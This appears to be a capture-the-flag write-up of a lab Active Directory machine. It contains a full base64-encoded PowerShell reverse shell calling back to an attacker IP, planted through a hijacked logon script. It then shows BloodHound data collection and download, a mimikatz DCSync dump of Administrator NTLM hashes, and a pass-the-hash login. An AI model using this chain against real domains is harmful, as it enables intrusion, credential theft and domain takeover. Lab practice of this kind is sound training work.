PSPath: Microsoft.PowerShell.Core\FileSystem::C:\windows\sysvol\domain\scripts\A2BFDCF13BB2\B00AC3C11C0E\BAEDDDCD2BCB\C0B3ACE33AEF\2C0A3DFE2030.bat
PSParentPath: Microsoft.PowerShell.Core\FileSystem::C:\windows\sysvol\domain\scripts\A32FF3AEAA23
PSChildName: 2C0A3DFE2030.bat
PSDrive: C
PSProvider: Microsoft.PowerShell.Core\FileSystem
CentralAccessPolicyId:
CentralAccessPolicyName:
Path: Microsoft.PowerShell.Core\FileSystem::C:\windows\sysvol\domain\scripts\A2BFDCF13BB2\B00AC3C11C0E\BAEDDDCD2BCB\C0B3ACE33AEF\2C0A3DFE2030.bat
Owner: BLAZORIZED\RSA_4810
Group: BLAZORIZED\Domain Users
Access: System.Security.AccessControl.FileSystemAccessRule System.Security.AccessControl.FileSystemAccessRule System.Security.AccessControl.FileSystemAccessRule System.Security.AccessControl.FileSystemAccessRule System.Security.AccessControl.FileSystemAccessRule System.Security.AccessControl.FileSystemAccessRule
Sddl: O:S-1-5-21-2039403211-964143010-2924010611-1107G:DUD:AI(A;ID;0x1201bf;;;S-1-5-21-2039403211-964143010-2924010611-1107)(A;ID;0x1200a9;;;AU)(A;ID;0x1200a9;;;SO)(A;ID;FA;;;BA)(A;ID;FA;;;SY)(A;ID;FA;;;S-1-5-21-2039403211-964143010-2924010611-1107)
AccessToString: BLAZORIZED\RSA_4810 Allow Write, ReadAndExecute, Synchronize
NT AUTHORITY\Authenticated Users Allow ReadAndExecute, Synchronize
BUILTIN\Server Operators Allow ReadAndExecute, Synchronize
BUILTIN\Administrators Allow FullControl
NT AUTHORITY\SYSTEM Allow FullControl
BLAZORIZED\RSA_4810 Allow FullControl
AuditToString:
AccessRightType: System.Security.AccessControl.FileSystemRights
AccessRuleType: System.Security.AccessControl.FileSystemAccessRule
AuditRuleType: System.Security.AccessControl.FileSystemAuditRule
AreAccessRulesProtected: False
AreAuditRulesProtected: False
AreAccessRulesCanonical: True
AreAuditRulesCanonical: True
## Note: If shit is fuzzy it's because of other players! Had to restart machine.Villain > generate payload=windows/netcat/powershell_reverse_tcp lhost=tun0 encode
Generating backdoor payload...
powershell -ep bypass -e BASE64_ENCODED_PAYLOAD
---
*Evil-WinRM* PS C:\windows\sysvol\domain\scripts\A2BFDCF13BB2\B00AC3C11C0E\BAEDDDCD2BCB\C0B3ACE33AEF\2C0A3DFE2030> echo 'powershell -ep bypass -e UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAUABTAEgATwBNAEUAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAewAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBvAGMAawBlAHQAcwAuAFQAQwBQAEMAbABpAGUAbgB0ACgAJwAxADAALgAxADAALgAxADYALgA3ADIAJwAsADQANAA0ADMAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACcAUABTACAAJwAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACcAPgAgACcAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkAfQAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4A' > C:\windows\sysvol\domain\scripts\A2BFDCF13BB2\B00AC3C11C0E\BAEDDDCD2BCB\C0B3ACE33AEF\2C0A3DFE2030.bat
*Evil-WinRM* PS C:\windows\sysvol\domain\scripts\A2BFDCF13BB2\B00AC3C11C0E\BAEDDDCD2BCB\C0B3ACE33AEF> Set-DomainObject SSA_6010 -Set @{'scriptPath'='\\dc1\NETLOGON\A2BFDCF13BB2\B00AC3C11C0E\BAEDDDCD2BCB\C0B3ACE33AEF\2C0A3DFE2030\2C0A3DFE2030.bat'} -Verbose
Verbose: [Get-DomainSearcher] search base: LDAP://DC=blazorized,DC=htb
Verbose: [Get-DomainObject] Get-DomainObject filter string: (&(|(|(samAccountName=SSA_6010)(name=SSA_6010)(displayname=SSA_6010))))
Verbose: [Set-DomainObject] Setting 'scriptPath' to '\\dc1\NETLOGON\A2BFDCF13BB2\B00AC3C11C0E\BAEDDDCD2BCB\C0B3ACE33AEF\2C0A3DFE2030\2C0A3DFE2030.bat' for object 'SSA_6010'Im not sure why, but Villain payload kept failing to get connection from logon script. Using Powershell #3 (Base64) made the connection... Meanwhile I was trying different things and ended up using the following path. The domain directory would have probably also worked, but not gonna test it since I have shell......
*Evil-WinRM* PS C:\windows\sysvol\sysvol\blazorized.htb\scripts\A32FF3AEAA23> Set-DomainObject SSA_6010 -Set @{'scriptPath'='A32FF3AEAA23\rev.bat'} -Verbose
*Evil-WinRM* PS C:\windows\sysvol\sysvol\blazorized.htb\scripts\A32FF3AEAA23> upload rev2.bat C:\windows\sysvol\sysvol\blazorized.htb\scripts\A32FF3AEAA23\rev.bat
*Evil-WinRM* PS C:\windows\sysvol\sysvol\blazorized.htb\scripts\A32FF3AEAA23> Get-DomainUser | ? { $_.Displayname -eq "SSA_6010" } | Select name, scriptpath, lastlogon, logoncount
name scriptpath lastlogon logoncount
---- ---------- --------- ----------
SSA_6010 A32FF3AEAA23\rev.bat 7/3/2024 11:20:59 AM 3125Privilege Escalation (Administrator)
└─$ listen
Ncat: Version 7.94SVN ( https://nmap.org/ncat )
Ncat: Listening on [::]:4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.11.22:51683.
PS C:\Windows\system32> whoami /all
User Name SID
=================== =============================================
blazorized\ssa_6010 S-1-5-21-2039403211-964143010-2924010611-1124
Group Name Type SID Attributes
========================================== ================ ============================================= ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Group used for deny only
NT AUTHORITY\INTERACTIVE Well-known group S-1-5-4 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
BLAZORIZED\Super_Support_Administrators Group S-1-5-21-2039403211-964143010-2924010611-1123 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
Privilege Name Description State
============================= ============================== ========
SeMachineAccountPrivilege Add workstations to domain Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set DisabledGather data as ssa_6010 user and exfiltrate it.
PS C:\users\public> .\SH.exe -c all --zipfilename sh.zip
---
*Evil-WinRM* PS C:\users\public> download 20240703113106_sh.zip
Since mimikatz is interactive I upgraded the netcat to ConPtyShell.
└─$ cp /usr/share/windows-resources/mimikatz/x64/mimikatz.exe .
---
*Evil-WinRM* PS C:\users\public> upload mimikatz.exe mimi.exe
---
mimikatz # lsadump::dcsync /user:administrator
[DC] 'blazorized.htb' will be the domain
[DC] 'DC1.blazorized.htb' will be the DC server
[DC] 'administrator' will be the user account
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
Object RDN : Administrator
** SAM ACCOUNT **
SAM Username : Administrator
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD )
Account expiration :
Password last change : 2/25/2024 12:54:43 PM
Object Security ID : S-1-5-21-2039403211-964143010-2924010611-500
Object Relative ID : 500
Credentials:
Hash NTLM: f55ed1465179ba374ec1cad05b34a5f3
ntlm- 0: f55ed1465179ba374ec1cad05b34a5f3
ntlm- 1: eecc741ecf81836dcd6128f5c93313f2
ntlm- 2: c543bf260df887c25dd5fbacff7dcfb3
ntlm- 3: c6e7b0a59bf74718bce79c23708a24ff
ntlm- 4: fe57c7727f7c2549dd886159dff0d88a
ntlm- 5: b471c416c10615448c82a2cbb731efcb
ntlm- 6: b471c416c10615448c82a2cbb731efcb
ntlm- 7: aec132eaeee536a173e40572e8aad961
ntlm- 8: f83afb01d9b44ab9842d9c70d8d2440a
ntlm- 9: bdaffbfe64f1fc646a3353be1c2c3c99
lm - 0: ad37753b9f78b6b98ec3bb65e5995c73
lm - 1: c449777ea9b0cd7e6b96dd8c780c98f0
lm - 2: ebbe34c80ab8762fa51e04bc1cd0e426
lm - 3: 471ac07583666ccff8700529021e4c9f
lm - 4: ab4d5d93532cf6ad37a3f0247db1162f
lm - 5: ece3bdafb6211176312c1db3d723ede8
lm - 6: 1ccc6a1cd3c3e26da901a8946e79a3a5
lm - 7: 8b3c1950099a9d59693858c00f43edaf
lm - 8: a14ac624559928405ef99077ecb497ba
...Go over to crackstation
Trying admin with cracked password failed.
└─$ evil-winrm -i 10.10.11.22 -u 'administrator' -p 'qaz123!'Using the pass the hash method we are able to login.
└─$ evil-winrm -i 10.10.11.22 -u 'administrator' -H 'f55ed1465179ba374ec1cad05b34a5f3'Flags
*Evil-WinRM* PS C:\Users> ls -Recurse -Filter *.txt
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 5/29/2024 3:42 PM 159 note.txt
-ar--- 7/3/2024 2:04 PM 34 root.txt
Directory: C:\Users\NU_1055\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 7/3/2024 2:04 PM 34 user.txt
*Evil-WinRM* PS C:\Users> ls -Recurse -Filter *.txt | cat
If you enjoyed this machine and want to learn more about DACL attacks, check out the 'DACL Attacks I' and 'DACL Attacks II' modules on HTB Academy.
- Pedant
5c81a83ff1166d58a4883b51762daea0
2bcf338975762fac5c9e0ca044dcfbebWriteup referenced:https://blog.csdn.net/m0_52742680/article/details/140102307
Last updated